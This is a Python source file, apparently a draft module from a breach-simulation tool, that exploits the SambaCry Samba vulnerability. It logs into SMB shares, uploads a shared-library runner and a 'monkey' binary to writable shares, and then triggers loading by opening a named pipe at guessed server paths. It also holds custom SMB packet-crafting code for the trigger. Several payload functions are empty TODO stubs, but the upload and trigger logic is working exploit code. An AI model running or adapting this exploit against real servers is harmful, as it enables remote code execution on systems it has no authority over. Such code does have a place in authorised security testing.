from optparse import OptionParser from impacket.dcerpc.v5 import transport from os import path from impacket.smbconnection import SMBConnection from impacket.smb import SessionError from impacket.nt_errors import STATUS_OBJECT_NAME_NOT_FOUND, STATUS_ACCESS_DENIED from impacket.nt_errors import STATUS_SUCCESS from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \ FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE from impacket.smb3structs import SMB2_IL_IMPERSONATION, SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2Create, SMB2Packet, \ SMB2Create_Response, SMB2_OPLOCK_LEVEL_NONE, SMB2_SESSION_FLAG_ENCRYPT_DATA __author__ = 'itay.mizeretz' # TODO: add documentation # TODO: add author # TODO: add logs # TODO: add exception handling # TODO: remove /home/user # TODO: take all from config FOLDER_PATHS_TO_GUESS = ['/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '', '/home/user'] RUNNER_FILENAME = "monkey_runner.so" COMMANDLINE_FILENAME = "monkey_commandline.txt" MONKEY_FILENAME = "monkey" def main(): parser = OptionParser() parser.add_option("-t", "--target", dest="target") (options, args) = parser.parse_args() if options.target: exploiter = SambaCryExploiter() exploiter.exploit(options.target) else: parser.print_help() # TODO: inherit from HostExploiter class SambaCryExploiter: _target_os_type = ['linux'] def __init__(self): self.module_binary = "" def exploit(self, ip): self.assert_smb_version() writable_shares = [] credentials_list = self.get_credentials_list() for credentials in credentials_list: smb_client = self.connect_to_server(ip, credentials) shares = self.list_shares(smb_client) for share in shares: if self.upload_module(smb_client, share): writable_shares.append(share) self.trigger_module(smb_client, share) # TODO: delete remains smb_client.logoff() def get_credentials_list(self): # TODO: get credentials from config return [{'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''}] def list_shares(self, smb_client): shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()] shares.remove("IPC$") return shares def assert_smb_version(self): # TODO: implement pass def upload_module(self, smb_client, share): try: tree_id = smb_client.connectTree(share) smb_client.putFile(share, "\\%s" % COMMANDLINE_FILENAME, self.get_monkey_commandline) smb_client.putFile(share, "\\%s" % RUNNER_FILENAME, self.get_monkey_runner_bin) smb_client.putFile(share, "\\%s" % MONKEY_FILENAME, self.get_monkey_bin) smb_client.disconnectTree(tree_id) return True except SessionError as e: if str(e).find('STATUS_ACCESS_DENIED') >= 0: return False raise def connect_to_server(self, ip, credentials): """ Connects to server using given credentials :param ip: IP of server :param credentials: credentials to log in with :return: SMBConnection object representing the connection """ smb_client = SMBConnection(ip, ip) smb_client.login(credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"]) return smb_client def trigger_module(self, smb_client, share_name): trigger_might_succeeded = False module_possible_paths = self.generate_module_possible_paths(share_name) for module_path in module_possible_paths: trigger_might_succeeded |= self.trigger_module_by_path(smb_client, module_path) return trigger_might_succeeded def trigger_module_by_path(self, smb_client, module_path): """ Tries triggering module by path :param smb_client: smb client object :param module_path: full path of the module. e.g. "/home/user/share/sc_module.so" :return: False on unexpected exception. True otherwise """ try: # the extra / on the beginning is required for the vulnerability self.openPipe(smb_client, "/" + module_path) except SessionError as e: # This is the expected result. We can't tell whether we succeeded or not just by this error code. if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') < 0: return False return True def generate_module_possible_paths(self, share_name): """ Generates array of possible paths :param share_name: Name of the share :return: Array of possible full paths to the module. """ return (('%s/%s/%s' % (folder_path, share_name, RUNNER_FILENAME)) for folder_path in FOLDER_PATHS_TO_GUESS) @staticmethod def get_monkey_bin(): # TODO pass @staticmethod def get_monkey_runner_bin(): # TODO pass @staticmethod def get_monkey_commandline(): # TODO pass # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability # def createSmb(self, smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None): packet = smb_client.getSMBServer().SMB_PACKET() packet['Command'] = SMB2_CREATE packet['TreeID'] = treeId if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True: packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS smb2Create = SMB2Create() smb2Create['SecurityFlags'] = 0 smb2Create['RequestedOplockLevel'] = oplockLevel smb2Create['ImpersonationLevel'] = impersonationLevel smb2Create['DesiredAccess'] = desiredAccess smb2Create['FileAttributes'] = fileAttributes smb2Create['ShareAccess'] = shareMode smb2Create['CreateDisposition'] = creationDisposition smb2Create['CreateOptions'] = creationOptions smb2Create['NameLength'] = len(fileName) * 2 if fileName != '': smb2Create['Buffer'] = fileName.encode('utf-16le') else: smb2Create['Buffer'] = '\x00' if createContexts is not None: smb2Create['Buffer'] += createContexts smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength'] smb2Create['CreateContextsLength'] = len(createContexts) else: smb2Create['CreateContextsOffset'] = 0 smb2Create['CreateContextsLength'] = 0 packet['Data'] = smb2Create packetID = smb_client.getSMBServer().sendSMB(packet) ans = smb_client.getSMBServer().recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): createResponse = SMB2Create_Response(ans['Data']) # The client MUST generate a handle for the Open, and it MUST # return success and the generated handle to the calling application. # In our case, str(FileID) return str(createResponse['FileID']) def openPipe(self, smb_client, pathName): # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style # to make things easier for the caller. Not this time ;) treeId = smb_client.connectTree('IPC$') # TODO: uncomment #logging.info('Final path to load is %s' % pathName) #logging.info('Triggering bug now, cross your fingers') if smb_client.getDialect() == SMB_DIALECT: _, flags2 = smb_client.getSMBServer().get_flags() pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = SMBNtCreateAndX_Parameters() ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2) ntCreate['Parameters']['FileNameLength'] = len(pathName) ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA ntCreate['Parameters']['FileAttributes'] = 0 ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE ntCreate['Parameters']['CreateOptions'] = FILE_OPEN ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION ntCreate['Parameters']['SecurityFlags'] = 0 ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Data']['FileName'] = pathName if flags2 & SMB.FLAGS2_UNICODE: ntCreate['Data']['Pad'] = 0x0 return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: return self.createSmb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, shareMode=FILE_SHARE_READ, creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0) if __name__=="__main__": main()